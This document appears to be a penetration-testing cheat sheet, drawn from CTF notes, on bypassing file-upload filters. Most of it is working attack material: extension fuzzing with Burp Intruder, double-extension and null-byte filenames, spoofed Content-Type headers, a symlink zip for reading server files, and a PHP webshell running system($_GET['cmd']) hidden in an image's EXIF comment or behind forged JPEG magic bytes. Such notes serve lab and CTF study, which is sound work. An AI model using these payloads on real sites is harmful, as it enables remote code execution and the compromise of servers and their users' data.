Upload File

What extension is allowed ?

Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.

Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:

Use /usr/share/wordlists/dirb/extensions_common.txt

Uncheck url-encoding

Run the attack

Rename it

shell.php.jpg
shell.png.php
shell.jpeg.php5

Content Type

Content-Disposition: form-data; name="myFile"; filename="php-reverse-shell.php"
Content-Type: application/x-php

#Change to Content-Type: image/jpeg 

Null Byte

blank.php%00.png
blank.php%2500.png

In image - exiftool

root@Host-001:~/Bureau# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' blank.png
root@Host-001:~/Bureau# mv blank.png blank.php.png

Zip file

ln -s ../ symindex.txt
zip --symlinks test3.zip symindex.txt

1. upload zip 2. visit symindex.txt

Magic Number

Add four "A" on the first line of shell.php.

hexeditor shell.php

Change the first 4 bytes "41 41 41 41" to "FF D8 FF DB" (jpeg magic number)

Result:

00000000 FF D8 FF DB 3C 3F 70 68 70 20 73 79 73 74 65 6D <?php system 00000010 28 24 5F 47 45 54 5B 63 6D 64 5D 29 3B 20 3F 3E ET[cmd]); ?> 00000020 0A

Save. Verification: file shell.php : shell.php: JPEG image data

Magic numbers list:

PayloadsAllTheThings/Upload Insecure Files at master · swisskyrepo/PayloadsAllTheThingsGitHub

Sources

Bypassing File Upload RestrictionsPenetration Testing Lab

HTB - Networked0xSs0rZ

CTF-notes/bypass_image_upload.md at master · Shiva108/CTF-notesGitHub